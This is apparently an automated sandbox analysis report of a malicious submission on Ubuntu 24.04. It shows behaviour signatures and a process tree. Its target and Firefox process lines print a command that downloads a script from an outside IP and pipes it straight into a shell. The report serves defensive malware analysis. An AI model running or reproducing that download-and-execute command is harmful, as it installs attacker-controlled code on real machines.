Analysis

  • max time kernel
    43s
  • max time network
    128s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20250610-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20250610-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    03/07/2025, 05:56

General

  • Target

    http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16

Score
6/10

Malware Config

Signatures

  • Checks hardware identifiers (DMI) 1 TTPs 1 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Reads hardware information 1 TTPs 1 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Changes its process name 64 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 10 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 42 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 59 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

  • cURL User-Agent 11 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • /usr/bin/firefox
    firefox -new-tab "http://bash -c \"curl 158.51.126.131/zy.sh -o- | sh\";echo -n \"H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16"
    1⤵
      PID:2036
    • /usr/lib/firefox/firefox-bin
      firefox -new-tab "http://bash -c \"curl 158.51.126.131/zy.sh -o- | sh\";echo -n \"H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16"
      1⤵
      • Checks hardware identifiers (DMI)
      • Reads hardware information
      • Changes its process name
      • Checks CPU configuration
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:2036
      • /usr/lib/firefox/crashhelper
        /usr/lib/firefox/crashhelper 2036 9 /tmp/ 10 12
        2⤵
          PID:2050
        • /usr/local/sbin/dbus-launch
          dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
          2⤵
            PID:2054
          • /usr/local/bin/dbus-launch
            dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
            2⤵
              PID:2054
            • /usr/sbin/dbus-launch
              dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
              2⤵
                PID:2054
              • /usr/bin/dbus-launch
                dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                2⤵
                • Reads runtime system information
                PID:2054
                • /usr/bin/dbus-daemon
                  /usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session
                  3⤵
                  • Enumerates kernel/hardware configuration
                  • Reads runtime system information
                  PID:2056
                  • /usr/libexec/xdg-desktop-portal
                    /usr/libexec/xdg-desktop-portal
                    4⤵
                    • Reads runtime system information
                    PID:2106
                  • /usr/libexec/at-spi-bus-launcher
                    /usr/libexec/at-spi-bus-launcher
                    4⤵
                    • Reads runtime system information
                    PID:2109
                  • /usr/libexec/xdg-document-portal
                    /usr/libexec/xdg-document-portal
                    4⤵
                    • Reads runtime system information
                    PID:2126
                    • /usr/bin/fusermount3
                      fusermount3 -o "rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal" -- /root/.cache/doc
                      5⤵
                        PID:2140
                    • /usr/libexec/xdg-permission-store
                      /usr/libexec/xdg-permission-store
                      4⤵
                      • Reads runtime system information
                      PID:2133
                    • /usr/libexec/xdg-desktop-portal-gtk
                      /usr/libexec/xdg-desktop-portal-gtk
                      4⤵
                      • Reads runtime system information
                      PID:2145
                    • /usr/libexec/gvfsd
                      /usr/libexec/gvfsd
                      4⤵
                      • Reads runtime system information
                      PID:2150
                      • /usr/libexec/gvfsd-fuse
                        /usr/libexec/gvfsd-fuse /root/.gvfs -f
                        5⤵
                        • Reads runtime system information
                        PID:2156
                • /usr/local/sbin/dbus-launch
                  dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                  2⤵
                    PID:2060
                  • /usr/local/bin/dbus-launch
                    dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                    2⤵
                      PID:2060
                    • /usr/sbin/dbus-launch
                      dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                      2⤵
                        PID:2060
                      • /usr/bin/dbus-launch
                        dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                        2⤵
                          PID:2060
                        • /usr/lib/firefox/glxtest
                          /usr/lib/firefox/glxtest -f 17
                          2⤵
                          • Changes its process name
                          • Reads CPU attributes
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:2062
                        • /usr/local/sbin/dbus-launch
                          dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                          2⤵
                            PID:2069
                          • /usr/local/bin/dbus-launch
                            dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                            2⤵
                              PID:2069
                            • /usr/sbin/dbus-launch
                              dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                              2⤵
                                PID:2069
                              • /usr/bin/dbus-launch
                                dbus-launch "--autolaunch=36e6eb39a6fa405996e79cad2731865d" --binary-syntax --close-stderr
                                2⤵
                                  PID:2069
                                • /usr/lib/firefox/firefox-bin
                                  /usr/lib/firefox/firefox-bin -contentproc -ipcHandle 0 -initialChannelId "{0cd4c6bc-69f1-486e-bc88-aabae6e45197}" -parentPid 2036 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser 1 forkserver
                                  2⤵
                                  • Reads CPU attributes
                                  • Enumerates kernel/hardware configuration
                                  • Reads runtime system information
                                  PID:2098

                              Network

                                    MITRE ATT&CK Enterprise v16

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads